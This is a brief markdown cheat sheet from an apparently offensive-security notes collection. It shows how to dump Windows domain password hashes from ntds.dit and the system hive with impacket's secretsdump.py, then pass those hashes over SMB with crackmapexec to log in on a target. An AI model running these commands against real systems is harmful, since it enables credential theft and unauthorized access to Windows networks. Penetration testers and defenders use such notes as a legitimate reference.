killchain-compendium/exploit/windows/docs/impacket.md

365 B

Impacket

Secretsdump

  • ntds.dit and system.hive are needed
secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
  • Remove everything but the hashes
  • Use it to log in on the target
crackmapexec smb $TARGET_IP -u <user> -H hashes.txt